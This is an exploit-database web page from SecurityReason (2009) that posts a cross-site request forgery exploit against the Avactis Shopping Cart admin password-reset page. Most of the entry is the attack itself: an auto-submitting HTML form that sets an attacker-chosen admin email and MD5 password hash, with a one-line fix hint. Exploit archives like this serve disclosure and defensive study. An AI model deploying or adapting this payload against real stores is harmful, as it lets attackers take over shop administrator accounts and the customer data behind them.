|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 6529 Credit : burtay Date : 05.07.2009 Exploit Code : ############################################################# # Application Name : Avactis Shopping Cart # Vulnerable Type : xsrf # Infection : Uzaktan otomatik olarak admin maili ve şifresi değiştirelebilir.exploitteki password kısmı md5 olmalı # Bug Fix Advice : eski şifre sorulmalıdır. # author : burtay ############################################################ < ------------------- header data end of ------------------- > < -- bug code start -- > <burtay> <html><body> <FORM action="http://site.com/path/avactis-system/admin/admin_member_passwd_reset .php?asc_action=PasswordChange" method="POST" name="" id="PasswordChangeForm"> <INPUT TYPE="hidden" name="AdminEmail" value="cwburtay@hotmail.com"> <input type="password" value="c7ee6df0ea4e08a825256a512140f158" size="25" name="New_Password"> <input type="password" value="c7ee6df0ea4e08a825256a512140f158" size="25" name="Verify_New_Password"> <input type="submit" value="save"> <script> document.forms[0].submit() </script> </body></html> </burtay>  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |